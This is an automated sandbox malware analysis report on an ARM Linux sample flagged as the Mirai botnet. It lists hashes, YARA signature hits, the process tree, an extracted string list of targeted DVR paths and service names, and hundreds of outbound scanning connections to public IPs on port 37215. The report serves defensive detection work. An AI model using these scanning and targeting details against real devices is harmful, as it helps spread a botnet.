Loading Joe Sandbox Report ...

Edit tour

Linux Analysis Report
skyljne.arm7-20240113-1800.elf

Overview

General Information

Sample name:skyljne.arm7-20240113-1800.elf
Analysis ID:1374289
MD5:be7a7e0e8355279f2c61d2bbd3f50b51
SHA1:786bb300d0d80b9b6ab3997f8c03963473990c6e
SHA256:28ee3ff9eaea1125066a92cd4b437de9a7e46d206d331f234b8ec321c4eb1a96
Infos:

Detection

Mirai
Score:88
Range:0 - 100
Whitelisted:false

Signatures

Antivirus / Scanner detection for submitted sample
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Yara detected Mirai
Connects to many ports of the same IP (likely port scanning)
Uses known network protocols on non-standard ports
Detected TCP or UDP traffic on non-standard ports
Enumerates processes within the "proc" file system
Found strings indicative of a multi-platform dropper
HTTP GET or POST without a user agent
Sample and/or dropped files contains symbols with suspicious names
Sample contains strings indicative of BusyBox which embeds multiple Unix commands in a single executable
Uses the "uname" system call to query kernel version information (possible evasion)
Yara signature match

Classification

Analysis Advice

Some HTTP requests failed (404). It is likely that the sample will exhibit less behavior.
Static ELF header machine description suggests that the sample might not execute correctly on this machine.
Static ELF header machine description suggests that the sample might only run correctly on MIPS or ARM architectures.
Joe Sandbox version:38.0.0 Ammolite
Analysis ID:1374289
Start date and time:2024-01-13 19:01:08 +01:00
Joe Sandbox product:CloudBasic
Overall analysis duration:0h 5m 23s
Hypervisor based Inspection enabled:false
Report type:full
Cookbook file name:defaultlinuxfilecookbook.jbs
Analysis system description:Ubuntu Linux 20.04 x64 (Kernel 5.4.0-72, Firefox 91.0, Evince Document Viewer 3.36.10, LibreOffice 6.4.7.2, OpenJDK 11.0.11)
Analysis Mode:default
Sample name:skyljne.arm7-20240113-1800.elf
Detection:MAL
Classification:mal88.troj.linELF@0/1025@18/0
  • Report size exceeded maximum capacity and may have missing network information.
Command:/tmp/skyljne.arm7-20240113-1800.elf
PID:5421
Exit Code:0
Exit Code Info:
Killed:False
Standard Output:
done.
Standard Error:
  • system is lnxubuntu20
  • sh (PID: 5436, Parent: 1588, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: /bin/sh -e -u -c "export GIO_LAUNCHED_DESKTOP_FILE_PID=$$; exec \"$@\"" sh /usr/libexec/gsd-print-notifications
  • gsd-print-notifications (PID: 5436, Parent: 1588, MD5: 71539698aa691718cee775d6b9450ae2) Arguments: /usr/libexec/gsd-print-notifications
  • gdm3 New Fork (PID: 5444, Parent: 1400)
  • Default (PID: 5444, Parent: 1400, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: /etc/gdm3/PrimeOff/Default
  • gdm3 New Fork (PID: 5460, Parent: 1400)
  • Default (PID: 5460, Parent: 1400, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: /etc/gdm3/PrimeOff/Default
  • systemd New Fork (PID: 5465, Parent: 1)
  • systemd-user-runtime-dir (PID: 5465, Parent: 1, MD5: d55f4b0847f88131dbcfb07435178e54) Arguments: /lib/systemd/systemd-user-runtime-dir stop 127
  • cleanup
NameDescriptionAttributionBlogpost URLsLink
MiraiMirai is one of the first significant botnets targeting exposed networking devices running Linux. Found in August 2016 by MalwareMustDie, its name means "future" in Japanese. Nowadays it targets a wide range of networked embedded devices such as IP cameras, home routers (many vendors involved), and other IoT devices. Since the source code was published on "Hack Forums" many variants of the Mirai family appeared, infecting mostly home networks all around the world.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/elf.mirai
SourceRuleDescriptionAuthorStrings
skyljne.arm7-20240113-1800.elfJoeSecurity_Mirai_3Yara detected MiraiJoe Security
    skyljne.arm7-20240113-1800.elfJoeSecurity_Mirai_8Yara detected MiraiJoe Security
      skyljne.arm7-20240113-1800.elfLinux_Trojan_Gafgyt_28a2fe0cunknownunknown
      • 0x1a4e4:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
      • 0x1a4f8:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
      • 0x1a50c:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
      • 0x1a520:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
      • 0x1a534:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
      • 0x1a548:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
      • 0x1a55c:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
      • 0x1a570:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
      • 0x1a584:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
      • 0x1a598:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
      • 0x1a5ac:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
      • 0x1a5c0:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
      • 0x1a5d4:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
      • 0x1a5e8:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
      • 0x1a5fc:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
      • 0x1a610:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
      • 0x1a624:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
      • 0x1a638:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
      • 0x1a64c:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
      • 0x1a660:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
      • 0x1a674:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
      SourceRuleDescriptionAuthorStrings
      5421.1.00007f81a4017000.00007f81a4034000.r-x.sdmpJoeSecurity_Mirai_3Yara detected MiraiJoe Security
        5421.1.00007f81a4017000.00007f81a4034000.r-x.sdmpJoeSecurity_Mirai_8Yara detected MiraiJoe Security
          5421.1.00007f81a4017000.00007f81a4034000.r-x.sdmpLinux_Trojan_Gafgyt_28a2fe0cunknownunknown
          • 0x1a4e4:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
          • 0x1a4f8:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
          • 0x1a50c:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
          • 0x1a520:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
          • 0x1a534:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
          • 0x1a548:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
          • 0x1a55c:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
          • 0x1a570:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
          • 0x1a584:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
          • 0x1a598:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
          • 0x1a5ac:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
          • 0x1a5c0:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
          • 0x1a5d4:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
          • 0x1a5e8:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
          • 0x1a5fc:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
          • 0x1a610:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
          • 0x1a624:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
          • 0x1a638:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
          • 0x1a64c:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
          • 0x1a660:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
          • 0x1a674:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
          Process Memory Space: skyljne.arm7-20240113-1800.elf PID: 5421JoeSecurity_Mirai_3Yara detected MiraiJoe Security
            Process Memory Space: skyljne.arm7-20240113-1800.elf PID: 5421Linux_Trojan_Gafgyt_28a2fe0cunknownunknown
            • 0x6f6:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
            • 0x70a:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
            • 0x71e:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
            • 0x732:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
            • 0x746:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
            • 0x75a:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
            • 0x76e:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
            • 0x782:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
            • 0x796:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
            • 0x7aa:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
            • 0x7be:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
            • 0x7d2:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
            • 0x7e6:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
            • 0x7fa:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
            • 0x80e:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
            • 0x822:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
            • 0x836:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
            • 0x84a:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
            • 0x85e:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
            • 0x872:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
            • 0x886:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
            No Snort rule has matched

            Click to jump to signature section

            Show All Signature Results

            AV Detection

            barindex
            Source: skyljne.arm7-20240113-1800.elfAvira: detected
            Source: skyljne.arm7-20240113-1800.elfReversingLabs: Detection: 50%
            Source: skyljne.arm7-20240113-1800.elfString: Content-Length: /proc/proc/%d/cmdline/proc//proc/%s/exe/proc/self/exevar/Challengeapp/hi3511gmDVRiboxusr/dvr_main _8182T_1108mnt/mtd/app/guivar/Kylinl0 c/udevdanko-app/ankosample _8182T_1104var/tmp/soniahicorestm_hi3511_dvr/bin/busybox/usr/lib/systemd/systemd/usr/libexec/openssh/sftp-serverusr/shellmnt/sys/bin/boot/media/srv/var/run/sbin/lib/etc/dev/home/Davincitelnetsshwatchdog/var/spool/var/Sofiasshd/usr/compress/bin//compress/bin/compress/usr/bashhttpdtelnetddropbearropbearencodersystem/root/dvr_gui//root/dvr_app//var/tmp//anko-app//opt/wgetcurlbusyboxechocatnano

            Networking

            barindex
            Source: global trafficTCP traffic: 157.106.128.186 ports 1,2,3,5,7,37215
            Source: unknownNetwork traffic detected: HTTP traffic on port 47492 -> 37215
            Source: unknownNetwork traffic detected: HTTP traffic on port 58876 -> 37215
            Source: unknownNetwork traffic detected: HTTP traffic on port 58876 -> 37215
            Source: unknownNetwork traffic detected: HTTP traffic on port 58876 -> 37215
            Source: unknownNetwork traffic detected: HTTP traffic on port 58876 -> 37215
            Source: unknownNetwork traffic detected: HTTP traffic on port 58876 -> 37215
            Source: unknownNetwork traffic detected: HTTP traffic on port 35598 -> 37215
            Source: unknownNetwork traffic detected: HTTP traffic on port 51088 -> 37215
            Source: unknownNetwork traffic detected: HTTP traffic on port 37215 -> 51088
            Source: global trafficTCP traffic: 192.168.2.13:34730 -> 41.61.170.141:37215
            Source: global trafficTCP traffic: 192.168.2.13:34730 -> 157.164.81.115:37215
            Source: global trafficTCP traffic: 192.168.2.13:34730 -> 157.88.102.17:37215
            Source: global trafficTCP traffic: 192.168.2.13:34730 -> 197.69.208.140:37215
            Source: global trafficTCP traffic: 192.168.2.13:34730 -> 197.175.96.252:37215
            Source: global trafficTCP traffic: 192.168.2.13:34730 -> 197.162.129.149:37215
            Source: global trafficTCP traffic: 192.168.2.13:34730 -> 41.177.67.31:37215
            Source: global trafficTCP traffic: 192.168.2.13:34730 -> 152.33.147.255:37215
            Source: global trafficTCP traffic: 192.168.2.13:34730 -> 41.145.217.125:37215
            Source: global trafficTCP traffic: 192.168.2.13:34730 -> 157.50.114.163:37215
            Source: global trafficTCP traffic: 192.168.2.13:34730 -> 41.27.103.226:37215
            Source: global trafficTCP traffic: 192.168.2.13:34730 -> 86.27.184.232:37215
            Source: global trafficTCP traffic: 192.168.2.13:34730 -> 41.230.10.28:37215
            Source: global trafficTCP traffic: 192.168.2.13:34730 -> 157.124.59.218:37215
            Source: global trafficTCP traffic: 192.168.2.13:34730 -> 116.243.201.102:37215
            Source: global trafficTCP traffic: 192.168.2.13:34730 -> 157.129.95.68:37215
            Source: global trafficTCP traffic: 192.168.2.13:34730 -> 41.201.139.66:37215
            Source: global trafficTCP traffic: 192.168.2.13:34730 -> 102.114.177.202:37215
            Source: global trafficTCP traffic: 192.168.2.13:34730 -> 41.120.27.18:37215
            Source: global trafficTCP traffic: 192.168.2.13:34730 -> 41.242.30.0:37215
            Source: global trafficTCP traffic: 192.168.2.13:34730 -> 174.248.173.16:37215
            Source: global trafficTCP traffic: 192.168.2.13:34730 -> 64.128.21.208:37215
            Source: global trafficTCP traffic: 192.168.2.13:34730 -> 157.141.34.204:37215
            Source: global trafficTCP traffic: 192.168.2.13:34730 -> 41.170.176.159:37215
            Source: global trafficTCP traffic: 192.168.2.13:34730 -> 41.60.107.215:37215
            Source: global trafficTCP traffic: 192.168.2.13:34730 -> 146.19.45.20:37215
            Source: global trafficTCP traffic: 192.168.2.13:34730 -> 157.35.28.251:37215
            Source: global trafficTCP traffic: 192.168.2.13:34730 -> 18.190.159.223:37215
            Source: global trafficTCP traffic: 192.168.2.13:34730 -> 41.222.39.49:37215
            Source: global trafficTCP traffic: 192.168.2.13:34730 -> 41.59.198.137:37215
            Source: global trafficTCP traffic: 192.168.2.13:34730 -> 197.140.236.1:37215
            Source: global trafficTCP traffic: 192.168.2.13:34730 -> 197.32.51.254:37215
            Source: global trafficTCP traffic: 192.168.2.13:34730 -> 41.53.123.43:37215
            Source: global trafficTCP traffic: 192.168.2.13:34730 -> 197.97.160.29:37215
            Source: global trafficTCP traffic: 192.168.2.13:34730 -> 157.67.15.130:37215
            Source: global trafficTCP traffic: 192.168.2.13:34730 -> 197.215.21.54:37215
            Source: global trafficTCP traffic: 192.168.2.13:34730 -> 157.54.54.54:37215
            Source: global trafficTCP traffic: 192.168.2.13:34730 -> 157.226.235.38:37215
            Source: global trafficTCP traffic: 192.168.2.13:34730 -> 41.31.36.174:37215
            Source: global trafficTCP traffic: 192.168.2.13:34730 -> 197.185.116.53:37215
            Source: global trafficTCP traffic: 192.168.2.13:34730 -> 197.64.2.97:37215
            Source: global trafficTCP traffic: 192.168.2.13:34730 -> 165.116.121.128:37215
            Source: global trafficTCP traffic: 192.168.2.13:34730 -> 197.239.236.161:37215
            Source: global trafficTCP traffic: 192.168.2.13:34730 -> 41.126.167.61:37215
            Source: global trafficTCP traffic: 192.168.2.13:34730 -> 157.29.150.72:37215
            Source: global trafficTCP traffic: 192.168.2.13:34730 -> 41.53.34.6:37215
            Source: global trafficTCP traffic: 192.168.2.13:34730 -> 41.210.220.65:37215
            Source: global trafficTCP traffic: 192.168.2.13:34730 -> 197.199.10.243:37215
            Source: global trafficTCP traffic: 192.168.2.13:34730 -> 157.7.5.11:37215
            Source: global trafficTCP traffic: 192.168.2.13:34730 -> 155.146.18.107:37215
            Source: global trafficTCP traffic: 192.168.2.13:34730 -> 196.130.209.72:37215
            Source: global trafficTCP traffic: 192.168.2.13:34730 -> 41.108.152.178:37215
            Source: global trafficTCP traffic: 192.168.2.13:34730 -> 41.48.165.196:37215
            Source: global trafficTCP traffic: 192.168.2.13:34730 -> 41.61.25.96:37215
            Source: global trafficTCP traffic: 192.168.2.13:34730 -> 41.80.217.241:37215
            Source: global trafficTCP traffic: 192.168.2.13:34730 -> 197.192.12.85:37215
            Source: global trafficTCP traffic: 192.168.2.13:34730 -> 157.136.112.85:37215
            Source: global trafficTCP traffic: 192.168.2.13:34730 -> 78.10.21.10:37215
            Source: global trafficTCP traffic: 192.168.2.13:34730 -> 197.144.222.85:37215
            Source: global trafficTCP traffic: 192.168.2.13:34730 -> 41.166.91.230:37215
            Source: global trafficTCP traffic: 192.168.2.13:34730 -> 157.191.243.127:37215
            Source: global trafficTCP traffic: 192.168.2.13:34730 -> 41.51.6.100:37215
            Source: global trafficTCP traffic: 192.168.2.13:34730 -> 154.151.205.190:37215
            Source: global trafficTCP traffic: 192.168.2.13:34730 -> 157.107.185.36:37215
            Source: global trafficTCP traffic: 192.168.2.13:34730 -> 41.156.88.124:37215
            Source: global trafficTCP traffic: 192.168.2.13:34730 -> 166.132.10.136:37215
            Source: global trafficTCP traffic: 192.168.2.13:34730 -> 197.163.16.186:37215
            Source: global trafficTCP traffic: 192.168.2.13:34730 -> 122.59.217.142:37215
            Source: global trafficTCP traffic: 192.168.2.13:34730 -> 17.179.194.246:37215
            Source: global trafficTCP traffic: 192.168.2.13:34730 -> 197.77.118.158:37215
            Source: global trafficTCP traffic: 192.168.2.13:34730 -> 197.41.53.11:37215
            Source: global trafficTCP traffic: 192.168.2.13:34730 -> 197.203.246.16:37215
            Source: global trafficTCP traffic: 192.168.2.13:34730 -> 41.228.183.249:37215
            Source: global trafficTCP traffic: 192.168.2.13:34730 -> 94.107.79.61:37215
            Source: global trafficTCP traffic: 192.168.2.13:34730 -> 197.218.178.149:37215
            Source: global trafficTCP traffic: 192.168.2.13:34730 -> 197.50.119.120:37215
            Source: global trafficTCP traffic: 192.168.2.13:34730 -> 157.195.142.12:37215
            Source: global trafficTCP traffic: 192.168.2.13:34730 -> 191.161.170.158:37215
            Source: global trafficTCP traffic: 192.168.2.13:34730 -> 41.134.107.157:37215
            Source: global trafficTCP traffic: 192.168.2.13:34730 -> 157.201.9.111:37215
            Source: global trafficTCP traffic: 192.168.2.13:34730 -> 157.119.64.73:37215
            Source: global trafficTCP traffic: 192.168.2.13:34730 -> 41.89.186.65:37215
            Source: global trafficTCP traffic: 192.168.2.13:34730 -> 157.186.31.42:37215
            Source: global trafficTCP traffic: 192.168.2.13:34730 -> 197.123.213.120:37215
            Source: global trafficTCP traffic: 192.168.2.13:34730 -> 41.149.93.125:37215
            Source: global trafficTCP traffic: 192.168.2.13:34730 -> 157.254.197.228:37215
            Source: global trafficTCP traffic: 192.168.2.13:34730 -> 197.215.38.58:37215
            Source: global trafficTCP traffic: 192.168.2.13:34730 -> 197.222.1.118:37215
            Source: global trafficTCP traffic: 192.168.2.13:34730 -> 197.112.217.221:37215
            Source: global trafficTCP traffic: 192.168.2.13:34730 -> 157.62.106.74:37215
            Source: global trafficTCP traffic: 192.168.2.13:34730 -> 41.4.203.37:37215
            Source: global trafficTCP traffic: 192.168.2.13:34730 -> 41.234.13.118:37215
            Source: global trafficTCP traffic: 192.168.2.13:34730 -> 197.166.133.156:37215
            Source: global trafficTCP traffic: 192.168.2.13:34730 -> 157.153.88.251:37215
            Source: global trafficTCP traffic: 192.168.2.13:34730 -> 157.175.38.229:37215
            Source: global trafficTCP traffic: 192.168.2.13:34730 -> 197.1.59.25:37215
            Source: global trafficTCP traffic: 192.168.2.13:34730 -> 197.90.67.111:37215
            Source: global trafficTCP traffic: 192.168.2.13:34730 -> 157.63.130.48:37215
            Source: global trafficTCP traffic: 192.168.2.13:34730 -> 197.26.105.198:37215
            Source: global trafficTCP traffic: 192.168.2.13:34730 -> 41.122.214.62:37215
            Source: global trafficTCP traffic: 192.168.2.13:34730 -> 109.9.99.127:37215
            Source: global trafficTCP traffic: 192.168.2.13:34730 -> 73.198.77.58:37215
            Source: global trafficTCP traffic: 192.168.2.13:34730 -> 157.224.51.80:37215
            Source: global trafficTCP traffic: 192.168.2.13:34730 -> 197.197.207.145:37215
            Source: global trafficTCP traffic: 192.168.2.13:34730 -> 41.55.48.255:37215
            Source: global trafficTCP traffic: 192.168.2.13:34730 -> 197.174.132.238:37215
            Source: global trafficTCP traffic: 192.168.2.13:34730 -> 197.116.196.126:37215
            Source: global trafficTCP traffic: 192.168.2.13:34730 -> 157.98.99.95:37215
            Source: global trafficTCP traffic: 192.168.2.13:34730 -> 157.248.189.144:37215
            Source: global trafficTCP traffic: 192.168.2.13:34730 -> 41.97.185.171:37215
            Source: global trafficTCP traffic: 192.168.2.13:34730 -> 41.185.149.156:37215
            Source: global trafficTCP traffic: 192.168.2.13:34730 -> 41.233.63.248:37215
            Source: global trafficTCP traffic: 192.168.2.13:34730 -> 197.134.72.212:37215
            Source: global trafficTCP traffic: 192.168.2.13:34730 -> 39.74.73.183:37215
            Source: global trafficTCP traffic: 192.168.2.13:34730 -> 197.129.97.245:37215
            Source: global trafficTCP traffic: 192.168.2.13:34730 -> 157.92.109.180:37215
            Source: global trafficTCP traffic: 192.168.2.13:34730 -> 157.90.24.223:37215
            Source: global trafficTCP traffic: 192.168.2.13:34730 -> 197.158.177.194:37215
            Source: global trafficTCP traffic: 192.168.2.13:34730 -> 65.234.240.246:37215
            Source: global trafficTCP traffic: 192.168.2.13:34730 -> 197.119.61.67:37215
            Source: global trafficTCP traffic: 192.168.2.13:34730 -> 59.253.23.59:37215
            Source: global trafficTCP traffic: 192.168.2.13:34730 -> 179.91.16.50:37215
            Source: global trafficTCP traffic: 192.168.2.13:34730 -> 36.208.160.236:37215
            Source: global trafficTCP traffic: 192.168.2.13:34730 -> 197.93.71.129:37215
            Source: global trafficTCP traffic: 192.168.2.13:34730 -> 197.175.229.117:37215
            Source: global trafficTCP traffic: 192.168.2.13:34730 -> 157.159.157.2:37215
            Source: global trafficTCP traffic: 192.168.2.13:34730 -> 197.106.66.229:37215
            Source: global trafficTCP traffic: 192.168.2.13:34730 -> 41.82.63.159:37215
            Source: global trafficTCP traffic: 192.168.2.13:34730 -> 197.42.91.117:37215
            Source: global trafficTCP traffic: 192.168.2.13:34730 -> 157.79.55.5:37215
            Source: global trafficTCP traffic: 192.168.2.13:34730 -> 157.30.181.193:37215
            Source: global trafficTCP traffic: 192.168.2.13:34730 -> 41.28.191.94:37215
            Source: global trafficTCP traffic: 192.168.2.13:34730 -> 197.189.168.83:37215
            Source: global trafficTCP traffic: 192.168.2.13:34730 -> 197.138.96.2:37215
            Source: global trafficTCP traffic: 192.168.2.13:34730 -> 197.65.140.42:37215
            Source: global trafficTCP traffic: 192.168.2.13:34730 -> 197.157.90.165:37215
            Source: global trafficTCP traffic: 192.168.2.13:34730 -> 197.159.135.228:37215
            Source: global trafficTCP traffic: 192.168.2.13:34730 -> 211.214.82.98:37215
            Source: global trafficTCP traffic: 192.168.2.13:34730 -> 126.98.81.131:37215
            Source: global trafficTCP traffic: 192.168.2.13:34730 -> 197.65.130.143:37215
            Source: global trafficTCP traffic: 192.168.2.13:34730 -> 197.114.47.253:37215
            Source: global trafficTCP traffic: 192.168.2.13:34730 -> 197.32.136.190:37215
            Source: global trafficTCP traffic: 192.168.2.13:34730 -> 197.44.224.20:37215
            Source: global trafficTCP traffic: 192.168.2.13:34730 -> 157.106.128.186:37215
            Source: global trafficTCP traffic: 192.168.2.13:34730 -> 157.18.81.56:37215
            Source: global trafficTCP traffic: 192.168.2.13:34730 -> 197.185.117.202:37215
            Source: global trafficTCP traffic: 192.168.2.13:34730 -> 216.159.238.129:37215
            Source: global trafficTCP traffic: 192.168.2.13:34730 -> 41.96.193.83:37215
            Source: global trafficTCP traffic: 192.168.2.13:34730 -> 157.166.22.243:37215
            Source: global trafficTCP traffic: 192.168.2.13:34730 -> 41.9.15.251:37215
            Source: global trafficTCP traffic: 192.168.2.13:34730 -> 197.136.33.168:37215
            Source: global trafficTCP traffic: 192.168.2.13:34730 -> 197.96.47.112:37215
            Source: global trafficTCP traffic: 192.168.2.13:34730 -> 178.175.230.72:37215
            Source: global trafficTCP traffic: 192.168.2.13:34730 -> 99.50.8.193:37215
            Source: global trafficTCP traffic: 192.168.2.13:34730 -> 41.211.19.51:37215
            Source: global trafficTCP traffic: 192.168.2.13:34730 -> 41.250.199.72:37215
            Source: global trafficTCP traffic: 192.168.2.13:34730 -> 157.141.136.116:37215
            Source: global trafficTCP traffic: 192.168.2.13:34730 -> 197.152.79.72:37215
            Source: global trafficTCP traffic: 192.168.2.13:34730 -> 157.46.230.232:37215
            Source: global trafficTCP traffic: 192.168.2.13:34730 -> 157.191.196.120:37215
            Source: global trafficTCP traffic: 192.168.2.13:34730 -> 197.110.144.89:37215
            Source: global trafficTCP traffic: 192.168.2.13:34730 -> 197.84.153.88:37215
            Source: global trafficTCP traffic: 192.168.2.13:34730 -> 197.183.189.248:37215
            Source: global trafficTCP traffic: 192.168.2.13:34730 -> 41.187.97.124:37215
            Source: global trafficTCP traffic: 192.168.2.13:34730 -> 197.219.27.183:37215
